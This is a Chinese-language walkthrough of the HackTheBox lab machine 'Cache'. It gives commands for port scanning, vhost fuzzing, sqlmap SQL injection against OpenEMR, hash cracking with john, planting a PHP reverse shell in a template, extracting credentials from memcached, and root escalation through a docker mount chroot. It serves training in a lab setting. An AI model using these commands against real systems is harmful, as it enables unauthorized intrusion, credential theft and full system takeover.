Avatar {{帝力于我何有哉}} 不疯魔,不成活。 Be obsessed, or be average.


HackTheBox >_ Cache_188

Cache_188

image-20200917090522701

sudo masscan 10.10.10.188 --rate=1000 -p1-65535 -e tun0

image-20200625200227498

sudo nmap -O -A -Pn -T4 -v -p22,80 10.10.10.188

image-20200625200348492

sudo nmap -T4 -v -Pn --script=vuln -p22,80 10.10.10.188

image-20200625200502861

image-20200625202311237

image-20200625202338152

debug直接在引用的js中发现了明文凭证

image-20200625202429210

ash:H@v3_fun

使用凭证成功登录

image-20200625202915285

但是没什么有用信息

继续查看其他页面。Author页面提供给我们一些线索

image-20200625203302158

域名cache.htb加入hosts

image-20200625203556072

另外提供给我们他们的一个项目HMS(Hospital Management System)

搜索了一下

image-20200625203910771

存在漏洞利用,所以应该有这个页面。重新搜集关键词组成字典

cewl http://cache.htb/ -w wordlist.txt -d 10 -m 1

并没有枚举出更多的目录

image-20200625205130145

参考到说HMS是另外的一个项目,所以HMS应该和cache.htb并不是同一个域名,而应该是独立的另外一个站点。参考htb一贯的规律,应该是hms.htb,但是还是FUZZ一下,演示正确做法

wfuzz -w wordlist.txt -H "HOST: FUZZ.htb" -u http://10.10.10.188/

image-20200625205514248

过滤8193

wfuzz -w wordlist.txt -H "HOST: FUZZ.htb" -u http://10.10.10.188/ --hh 8193

image-20200625205820616

HMS.htb加入hosts

image-20200625205924313

重新浏览

image-20200625210046225

查询漏洞利用

image-20200625211552183

各个版本的漏洞很多,暂时还无法确定版本,whatweb和nikto也没有枚举出线索

先继续枚举目录,缩小范围。

image-20200625211948843

image-20200626040031138

没有进展。在google了一段时间后发现

image-20200626040121354

根据视频演示,应该在/portal/add_edit_event_user.php的一个参数eid存在注入。

尝试验证。

先浏览http://hms.htb/portal/点击注册

image-20200626040855614

此时会弹出注册页面

image-20200626040937466

忽略掉,直接在地址栏输入http://hms.htb/portal/add_edit_event_user.php?eid='

弹出数据库错误信息,验证成功。

image-20200626041107051

bp抓包

image-20200626041234822

复制内容存为文件,并将之前eid的参数值改为1,以方便sqlmap识别

sqlmap -r sql_pack.txt --dbs --batch

image-20200626041737686

sqlmap -r sql_pack.txt -D openemr --batch --tables

image-20200626043000262

sqlmap -r sql_pack.txt -D openemr -T users_secure --columns --batch

image-20200626043047299

sqlmap -r sql_pack.txt -D openemr -T users_secure -C password,username --batch --dump

image-20200626043405028

$2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B. | openemr_admin

解密hash

echo '$2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B.' > hash.txt
sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

image-20200626043816623

openemr_admin:xxxxxx

使用凭证登录成功

image-20200626044042610

image-20200626044135140

在左侧下拉菜单中选择适合写入rshell的php,考虑到不影响其他功能,写入最后一个空白的php

将php rshell的内容存入

image-20200626044726891

image-20200626044937230

在1337端口设立监听

根据上面的上传文件路径,浏览http://hms.htb/sites/default/letter_templates/custom_pdf.php

成功在1337得到目标shell,利用之前得到的ash的凭证切换到ash

image-20200626061625322

用户目录下得到user

image-20200626061837992

在kali工作目录建立服务,将lse(https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh)上传到靶机`/tmp`文件夹,用以快速枚举。

image-20200626063436871

image-20200626063420525

./lse.sh -i -l 2

发现本地端口监听3306和11211,3306应该是数据库。11211一般是memcached

image-20200626064903227

尝试利用memcached

可以通过telnet <端口(默认为11211)访问Memcache

telnet 127.0.0.1 11211

stats items枚举所有项目

image-20200626071403371

只有一个项目,dump项目1所有的键,stats cachedump 1 0

image-20200626071747551

get user读取user键的值

image-20200626071916619

同样,get passwd读取passwd键的值

image-20200626072110515

得到凭证

luffy:0n3_p1ec3

尝试ssh登录

image-20200626072318797

同时发现luffy是docker组成员,可以直接gtfobins利用。

docker images列出所有docker镜像

image-20200626072954374

docker run -v /:/mnt --rm -it ubuntu chroot /mnt bash

image-20200626073050413

image-20200626073141752